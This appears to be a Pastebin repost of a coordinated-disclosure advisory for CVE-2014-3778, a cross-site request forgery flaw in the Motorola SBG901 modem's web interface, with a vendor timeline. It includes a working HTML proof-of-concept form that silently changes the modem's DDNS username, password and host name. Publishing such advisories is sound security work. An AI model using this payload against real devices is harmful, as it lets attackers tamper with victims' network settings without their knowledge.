Advertisement
Mayk0

#; Motorola SBG901 Wireless Modem - CSRF Vulnerability

Jun 18th, 2014
238
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.27 KB | None | 0 0
  1. Full title Motorola SBG901 Wireless Modem - CSRF Vulnerability
  2. Date add 2014-06-18
  3. Category web applications
  4. Platform hardware
  5. Risk <font color="#A5DF00">Security Risk Low</font>
  6. CVE CVE: 2014-3778
  7.  
  8. ======================================================
  9.  
  10. Exploit Title : Motorola SBG901 Wireless Modem CSRF Vulnerability
  11. Google dork : N/A
  12. Exploit Author: Blessen Thomas
  13. Date : 06/01/2014
  14. Vendor Homepage : http://www.arrisi.com/modems/
  15. Software Link : N/A
  16. Version : Motorola SBG901 Wireless modem
  17. Tested on : Windows 7
  18. CVE : CVE-2014-3778
  19. Type of Application : Web application
  20. Release mode : Coordinated disclosure
  21.  
  22. Vulnerability description:
  23. It was observed that this modem's Web Application , is vulnerable to
  24. Cross-site request forgery through which attacker could manipulate user
  25. data via sending the victim malicious crafted url.
  26.  
  27. At attacker could change the username,password ,dns service and host name
  28. of the victim's account without the victim's knowledge.
  29.  
  30. Cross site request forgery
  31. x.x.x.x is the ip address of the modem.
  32.  
  33.  
  34.  
  35. <html>
  36. <!-- CSRF PoC --->
  37. <body>
  38. <form action="http://x.x.x.x/goform/RgDdns" method="POST">
  39. <input type="hidden" name="DdnsService" value="1" />
  40. <input type="hidden" name="DdnsUserName" value="test" />
  41. <input type="hidden" name="DdnsPassword" value="test" />
  42. <input type="hidden" name="DdnsHostName" value="test" />
  43. <input type="submit" value="Submit form" />
  44. </form>
  45. </body>
  46. </html>
  47.  
  48. Tools used :
  49. Mozilla firefox browser v28.0 , Burp proxy free edition v1.5
  50.  
  51. Timeline:
  52. - 31-03-14: Contacted Vendor with details of Vulnerability and Exploit.
  53. - 01-04-14: Vendor ARRIS (formerly Motorola) forwards to Surfboard Gateway
  54. product team for review
  55. - 15-04-14: Vendor contacted to know the status.
  56. - 01-05-14 : Contacted vendor to know the status and release the advisory
  57. publically
  58. - 02-05-14: Vendor acknowledged and responded that currently no fix
  59. available since the product is no longer in production and due end of life
  60. status product
  61. -14-05-14: Contacted vendor the final time to release the security advisory
  62. publically.
  63. -14-05-14 : Vendor responded to release the advisory publically.
  64. -15-05-14: Requested CVE ID from Mitre team
  65. -22-05-14: CVE ID obtained
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement